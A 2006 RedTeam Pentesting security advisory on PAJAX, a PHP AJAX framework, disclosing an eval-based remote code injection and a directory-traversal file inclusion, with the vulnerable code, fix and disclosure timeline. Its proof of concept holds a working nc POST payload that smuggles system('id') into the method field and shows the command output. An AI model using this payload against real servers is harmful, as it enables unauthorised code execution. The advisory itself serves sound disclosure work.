PAJAX Remote Code Injection and File Inclusion Vulnerability

RedTeam has identified two security flaws in PAJAX. It is possible to execute arbitrary PHP code from unchecked user input. Additionally, it is possible to include arbitrary files on the server ending in “.class.php”.

Details

• Product: PAJAX
• Affected Versions: All versions up to pajax-0.5.1
• Fixed Versions: pajax-0.5.2
• Vulnerability Type: Remote code injection, arbitrary file inclusion
• Security-Risk: high
• Vendor-URL: http://web.archive.org/web/20081019023305/http://auberger.com/pajax/3
• Vendor-Status: informed, fixed
• Advisory-URL: https://www.redteam-pentesting.de/advisories/rt-sa-2006-001
• Advisory-Status: public
• CVE: CVE-2006-1551 (Remote Code Injection)
• CVE-2006-1789 (File Inclusion Vulnerability)
• CVE-URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1551
• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1789

Introduction

PAJAX is an AJAX framework which allows simple PHP objects to be made remotely callable from within JavaScript, using XMLHttpRequest. PAJAX utilizes an ORB (Object Request Broker) pattern allowing JavaScript objects to call methods of remote PHP objects via some remote interface. PAJAX is developed by Georges Auberger.

More Details

By using PAJAX it is possible to write web applications that utilize PHP classes running on a remote server to perform operations. PAJAX is able to create a remote JavaScript interface object and a stub on the server for some PHP class. The JavaScript interface communicates with the stub on the server, which invokes the called methods on the remote object. To invoke methods on an object PHP’s eval function is used.

/pajax/pajax_call_dispatcher.php contains the following code:

// Invoking the method with args eval("$ret = $obj->$method(".$args.");");

The $method and $args parameters consist of unchecked POST variables, which may contain harmful PHP code.

Additionally a file is included for each specified classname. The included file consists of predefined paths and the user supplied variable $className:

function loadClass($className) {
$paths = split(CLASS_PATH_DELIMITER, $this->classPath); foreach ($paths as $path) { $classPath = $path . “/” . $className . “.class.php”;

[…]

This variable is not validated and thus allows directory traversal attacks.

Proof of Concept

[s@host ~]$ nc www.example.com 80 POST /pajax/pajax/pajax_call_dispatcher.php HTTP/1.1 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Content-Type: text/json Content-length: 137 Host: www.example.com

{“id”: “bb2238f1186dad8d6370d2bab5f290f71”, “className”: “Calculator”, “method”: “add(1,1);system(“id”);$obj->add”, “params”: [“1”, “5”]} HTTP/1.1 200 OK Date: Thu, 30 Mar 2006 14:21:08 GMT Server: Apache X-Powered-By: PHP/4.4.2 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Transfer-Encoding: chunked Content-Type: text/html

27 uid=80(www) gid=80(www) groups=80(www) […]

Workaround

No workaround is known at this time.

Fix

Users of PAJAX should upgrade to the latest version pajax-0.5.2 (http://web.archive.org/web/20081019023305/http://auberger.com/pajax/3).

Security Risk

RedTeam considers the security risk high, because arbitrary code can be executed on the webserver.

History

• 2006-03-30 Discovery of the problem
• 2006-03-30 Notification of the author
• 2006-03-30 Initial response from the author
• 2006-04-12 A fixed version of PAJAX is available
• 2006-04-13 Public release
• 2006-04-14 Added 2nd CVE, changed history to ISO 8601
• 2009-05-08 Updated Advisory URL

RedTeam

RedTeam offers interested business parties penetration tests to validate their security. Doing security research RedTeam likes to enhance the common knowledgebase in security-related areas. More information about RedTeam can be found at https://www.redteam-pentesting.de.